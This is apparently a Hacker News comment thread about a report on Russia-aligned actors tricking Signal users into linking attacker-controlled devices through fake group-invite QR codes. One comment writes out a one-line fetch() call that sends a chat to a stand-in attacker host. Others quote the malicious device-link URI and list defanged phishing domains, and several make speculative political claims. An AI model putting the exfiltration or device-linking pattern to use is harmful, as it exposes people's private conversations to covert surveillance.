Multiple Russia-aligned threat actors actively targeting Signal Messenger

Signal (and basically any app) with a linked devices workflow has been risky for awhile now. I touched on this last year (https://news.ycombinator.com/context?id=40303736) when Telegram was trash talking Signal -- and its implementation of linked devices has been problematic for a long time: https://eprint.iacr.org/2021/626.pdf.

I'm only surprised it took this long for an in-the-wild attack to appear in open literature.

It certainly doesn't help that signal themselves have discounted this attack (quoted from the iacr eprint paper):

    "We disclosed our findings to the Signal organization on October 20, 2020, and received an answer on October 28, 2020. In summary, they state that they do not treat a compromise of long-term secrets as part of their adversarial model"

One thing I'm realizing more and more (I've been building an encrypted AI chat service which is powered by encrypted CRDTs) is that "E2E encryption" really requires the client to be built and verified by the end user. I mean end of the day you can put a one-line fetch/analytics-tracker/etc on the rendering side and everything your protocol claimed to do becomes useless. That even goes further to the OS that the rendering is done on.

The last bit adds an interesting facet, even if you manage to open source the client and manage to make it verifiably buildable by the user, you still need to distribute it on the iOS store. Anything can happen in the publish process. I use iOS as the example because its particularly tricky to load your own build of an application.

And then if you did that, you still need to do it all on the other side of the chat too, assuming its a multi party chat.

You can have every cute protocol known to man, best encryption algorithms on the wire, etc but end of the day its all trust.

I mention this because these days I worry more that using something like signal actually makes you a target for snooping under the false guise that you are in a totally secure environment. If I were a government agency with intent to snoop I'd focus my resources on Signal users, they have the most to hide.

Sometimes it all feels pointless (besides encrypted storage).

I also feel weird that the bulk of the discussion is on hypothetical validity of a security protocol usually focused on the maths, when all of that can be subverted with a fetch("https://malvevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?

It is not plainly stated in the article, but as far as I understand, the first step of one of the attacks is to take the smartphone off a dead soldier’s body.

Is this suggesting that a single QR scan can on its own perform the device linking? If so, it seems like that's kind of the hole here, right? Like you shouldn't be able to scan a code that on its own links the device; you should have to manually confirm with like "Yes I want to link to this device". And then if you thought you were scanning a group invite code you'd realize you weren't. (Yeah, you'd still have to realize that, but I think it's a meaningful step up over just "you scanned a code to join a group and instead it silently linked a different device".)

Related: https://www.wired.com/story/russia-signal-qr-code-phishing-a... (https://web.archive.org/web/20250219110740/https://www.wired..., https://archive.ph/MbR9e)

(via https://news.ycombinator.com/item?id=43103692, but no comments there)

The good news is the target is targeted for a reason: it's still effective.

There are many voices which try to tell you that signal is compromised. Notice that all of those voices have less open-source-ness than Signal in virtually all cases.

Signal is doing its best to be a web scale company and also defend human rights. Individual dignity matters.

This is not a simple conversation.

You can check for unexpected linked devices in the settings menu.

They provided some domains, but not all of them are taken. For example, signal-protect[.]host is available, kropyva[.]site is available, signal-confirm[.]site is registered in Ukraine. Some of them are registered in Russia.

Never trust a country at war—any side. Party A blames B, Party B blames A, but both have their own agenda.

"Russia-aligned threat"... so... the US?

> In each of the fake group invites, JavaScript code that typically redirects the user to join a Signal group has been replaced by a malicious block containing the Uniform Resource Identifier (URI) used by Signal to link a new device to Signal (i.e., "sgnl://linkdevice?uuid="), tricking victims into linking their Signal accounts to a device controlled by UNC5792.

Missing from their recommendations: Install No Script: https://noscript.net/

They should add an option to not allow linking additional devices, if that’s feasible.

> Android supports alphanumeric passwords, which offer significantly more security than numeric-only PINs or patterns.

Ironic, coming from Google. As Android is THE only OS where usage of alphanumeric passwords is nearly impossible, as Android limits the length of a password to arbitrary 16 characters, preventing usage of passphrases.

Kind of a good sign for signal's security that this is the best Russia has got!

Last week it was Microsoft, now Signal, who’s next?

https://www.microsoft.com/en-us/security/blog/2025/02/13/sto...

Can't view the article, as I am an evil Tor user.

Am I reading this right? You can initiate device linking in Signal by clicking on an external URL? This is so stupid, I don't even have words for this. In a security-focused app you should not be able to link anything, without manually going into the devices/link menu and clicking "link new device".

“Russia's re-invasion of Ukraine”

Reading this for the first time, what is a “re-invasion”? Do they mean the explained cyber attack as second invasion aka “re-invasion”?

Signal should be doing something well.

Phone verification is a common method used here.

If somehow, the victims phone provider can be compromised or coerced into cooperating, the government actor can intercept the text message Signal and others use for verification and set up the victims account on a new device.

It's very easily done if the victim is located in an authoritarian county like Russia or Iran, they can simply force the local phone provider to co-operate.

that's nice they provided a list of bad domains

Honestly don't use Signal for privacy or anonymity. I switched to it because it is not owned by a sycophant of Trump.

Oh how Americans make fun of the CCP but watching all the tech bros bend the knee was embarrassing.

"Russia-aligned threat actors" has a whole new meaning this last week.

tldr: they mostly use phishing with fake ukrainian army group invites to trick people (from ukrainian army) to link the phone device to a attacker-controlled PC.

Also they try to get the actual database SQL files from Windows devices and Android devices.

I'd love to have more of my socializing happening on Signal. Anyone got a good way to convince the non-paranoid to use it?

Russia fucking up the worlds stuff this decade will be the material for history books. The are actively breaking Europe and almost noone seems to care.

Impossible these are our newly minted allies

So a few days ago Elon Musk blocked all links to Signal from the X platform and now this... Could be a coincidence but the timing sure is sus.

Alphabet is working in tandem with the Ukrainian SBU? Interesting choice, just as the US President has called Zelensky a dictator (and for good reason, Poroshenko, the previous Ukrainian president, has basically said the same thing a few days ago). I wonder how long the Alphabet higher-ups will allow this thing to unfold, or maybe they're not so good at reading the geopolitical tea leaves.

Highly likely...

Is this why twitter has been blocking signal.me links? https://news.ycombinator.com/item?id=43076710

State-aligned, huh? This is the US State Department talking point equivalent of a movie poster that brags, "From the studio that brought you..."